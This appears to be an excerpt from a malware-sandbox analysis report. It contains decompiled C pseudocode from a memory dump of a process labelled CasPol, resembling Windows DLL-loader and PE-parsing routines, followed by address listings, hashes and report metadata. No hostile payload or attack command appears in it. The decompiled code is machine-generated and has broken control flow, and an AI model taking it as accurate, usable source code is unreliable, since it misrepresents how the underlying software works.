										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x16c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01614A2C(0x16c6e40, 0x1614b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E015F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x15b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0160F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0160F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01657016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L015F2400(_t267 + 0x20);
															}
															L015F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01602397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E015F2280(_t134, 0x16c8608);
									__eflags =  *0x16c6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E015EFFB0(_t198, _t241, 0x16c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x16c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x16c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01606B90(_t210,  &_v64);
										_t262 =  *0x16c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0160E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0161006A(0x16c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x16c8608);
												E0161B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x16c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x16c6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E015EFFB0(_t198, _t240, 0x16c8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016100C2(0x16c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x016020a0
0x016020a8
0x016020ad
0x016020b3
0x016020b8
0x016020c2
0x016020c7
0x016020cb
0x016020d2
0x01602263
0x01602266
0x01645836
0x01645836
0x00000000
0x0160226c
0x0160226c
0x01602270
0x01602274
0x016020e2
0x016020e2
0x016020e6
0x016020ee
0x016457dc
0x016457de
0x016457ec
0x016457ec
0x016457f1
0x016457f3
0x016457f8
0x00000000
0x016457f8
0x016457e0
0x016457e4
0x016457ea
0x00000000
0x00000000
0x00000000
0x016457ea
0x016020f4
0x016020f4
0x016020f8
0x016020f8
0x016020fc
0x01602100
0x01602106
0x01602201
0x01602206
0x0160220b
0x0160220e
0x016022a9
0x016022ac
0x00000000
0x00000000
0x016022b2
0x016022b5
0x01645801
0x01645806
0x00000000
0x00000000
0x01645810
0x01645815
0x01645818
0x00000000
0x00000000
0x0164581e
0x016022bb
0x016022bb
0x01602218
0x01602218
0x0160221c
0x01602220
0x01602222
0x016022c2
0x016022c4
0x016022dc
0x016022dc
0x016022e1
0x00000000
0x00000000
0x00000000
0x016022e7
0x016022c8
0x016022cd
0x016022d3
0x016022d6
0x01645823
0x01645825
0x01645827
0x00000000
0x00000000
0x0164582d
0x00000000
0x0164582d
0x00000000
0x01602228
0x01602228
0x00000000
0x01602228
0x01602222
0x01602214
0x01602214
0x00000000
0x01602114
0x01602114
0x01602114
0x0160211a
0x0160211c
0x01602348
0x0160234d
0x01645840
0x01645845
0x01645848
0x0164584e
0x0164584e
0x01645848
0x01602353
0x01602355
0x01602388
0x01602388
0x01602368
0x0160236a
0x0160236c
0x0160238f
0x00000000
0x0160236e
0x0160236e
0x0160218e
0x0160218e
0x01602191
0x01602195
0x01645a03
0x01645a06
0x01645a0c
0x01645a0f
0x01645a11
0x01645a13
0x01645a13
0x01645a19
0x01645a1f
0x00000000
0x0160219b
0x0160219b
0x016021a0
0x01602282
0x01602284
0x01602284
0x01602284
0x01602284
0x016021a6
0x016021a9
0x016021ac
0x016021ae
0x016021b3
0x0160228b
0x01602290
0x01602379
0x01602296
0x01602298
0x01602298
0x01602290
0x016021b9
0x016021be
0x016022a2
0x016022a2
0x016021c4
0x016021c8
0x016021cc
0x016021d0
0x016021d4
0x016021de
0x016021e3
0x01645a29
0x01645a2c
0x00000000
0x00000000
0x01645a3b
0x00000000
0x016021e9
0x016021e9
0x016021e9
0x016021ee
0x016021f1
0x01645a45
0x01645a4b
0x01645a52
0x01645a58
0x01645a5d
0x01645a5f
0x01645a71
0x01645a61
0x01645a6a
0x01645a6a
0x01645a76
0x01645a79
0x01645a7f
0x01645a83
0x01645a85
0x01645a87
0x01645a87
0x01645a8c
0x01645a91
0x01645a97
0x01645a9f
0x01645aa0
0x01645aa1
0x01645aa6
0x01645aab
0x01645ab1
0x01645ab3
0x01645ab9
0x01645aca
0x01645ad4
0x01645ad4
0x01645ade
0x01645ade
0x01645aab
0x01645a79
0x01645a52
0x016021f7
0x016021f9
0x016021fe
0x016021fe
0x016021e3
0x01602195
0x0160236c
0x01602122
0x01602122
0x01602124
0x01602231
0x01602236
0x01602236
0x01602238
0x01602238
0x01602240
0x01602242
0x01602244
0x016459fc
0x0160218c
0x0160218c
0x00000000
0x0160218c
0x0160224a
0x0160224f
0x01602256
0x01602304
0x01602309
0x0160230f
0x0160231e
0x0160231e
0x0160231e
0x01602320
0x01602325
0x0160232a
0x0160232c
0x0160233e
0x0160233e
0x00000000
0x0160232c
0x01602311
0x01602317
0x0160231a
0x0160231c
0x01602380
0x01602380
0x01602380
0x01602384
0x00000000
0x00000000
0x01602386
0x00000000
0x0160231c
0x0160225c
0x0160225c
0x00000000
0x0160225c
0x0160212a
0x01602134
0x01602138
0x0160213d
0x01645858
0x01645863
0x01645863
0x01645867
0x0164586a
0x00000000
0x00000000
0x0164586c
0x0164586c
0x01645871
0x01645875
0x01645877
0x01645997
0x0164599c
0x016459a1
0x016459a7
0x016459a7
0x00000000
0x016459a7
0x0164587d
0x00000000
0x0164588b
0x0164588b
0x01645890
0x01645892
0x01645894
0x01645899
0x0164589b
0x016458a0
0x016458a0
0x016458aa
0x016458b2
0x016458b6
0x016458be
0x016458c6
0x016458c9
0x0164590d
0x01645917
0x0164591a
0x0164591c
0x01645920
0x01645928
0x0164592a
0x0164592c
0x0164592e
0x0164592e
0x016458cb
0x016458cd
0x016458d8
0x016458e0
0x016458f4
0x016458fe
0x016458fe
0x0164593a
0x0164593e
0x01645940
0x01645942
0x00000000
0x01645944
0x01645944
0x01645949
0x0164594e
0x0164594e
0x01645953
0x0164595b
0x01645976
0x01645976
0x0164597a
0x0164597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01645981
0x01645981
0x01645981
0x01645983
0x01645988
0x0164598d
0x01645991
0x01645991
0x00000000
0x0164595d
0x0164595d
0x01645963
0x01645965
0x00000000
0x00000000
0x00000000
0x00000000
0x01645967
0x01645967
0x0164596b
0x0164596d
0x00000000
0x00000000
0x0164596f
0x01645971
0x01645971
0x01645974
0x00000000
0x00000000
0x00000000
0x01645974
0x00000000
0x01645967
0x0164595b
0x01645942
0x01645863
0x01602143
0x01602143
0x01602149
0x0160214f
0x016022f1
0x016022f6
0x00000000
0x01602173
0x01602173
0x0160217d
0x01602181
0x01602186
0x016459ae
0x016459b2
0x016459b5
0x016459b7
0x016459ba
0x016459cd
0x016459d1
0x016459d5
0x016459d9
0x016459db
0x00000000
0x00000000
0x016459dd
0x016459dd
0x016459e1
0x016459e4
0x016459e7
0x016459ee
0x016459ee
0x016459f3
0x016459f3
0x00000000
0x01602186
0x0160214f
0x01602106
0x01602266
0x016020d8
0x016020da
0x016020e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdab831d6e2bfbdfb29cc4b0d6c293ec0513ac7eabc812fff3f79408224c35e
Instruction ID: 23ae2fa9b6b5b95cc5676977b664fe384f98e520ca8f841b7ad5176daeae360a
Opcode Fuzzy Hash: 9cdab831d6e2bfbdfb29cc4b0d6c293ec0513ac7eabc812fff3f79408224c35e
Instruction Fuzzy Hash: 82F1E1356083429FEB2ACF2CCC5476B7BE6AF85714F08855DEA968B381D774D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 015ED5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E015ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x16cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E015E6600(0x16c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x16c7b9c; // 0x0
							_t281 = L015F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0161F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x16c7b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x16c7b8c; // 0x1172ac8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E015F2280(_t200, 0x16c84d8);
									_t277 =  *0x16c85f4; // 0x1172fb8
									_t351 =  *0x16c85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1172f50
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E015EFFB0(_t287, _t353, 0x16c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0162CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E015E6600(0x16c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E015E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x16cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0165E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x16c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x16cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x16cb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E015F2280(_t250, 0x16c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01613898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E015EFFB0(_t293, _t353, 0x16c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016137F5(_t353, 0);
																}
																E01610413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01609B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016002D6(_t174);
																}
																L015F77F0( *0x16c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0160C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L015EEC7F(_t353);
										L016019B8(_t287, 0, _t353, 0);
										_t200 = E015DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x16cb2f8 |  *0x16cb2fc) == 0 || ( *0x16cb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0161B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x16cb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01686B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01686AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E015EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L015EEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01619730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E015EE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L015E8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01613C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
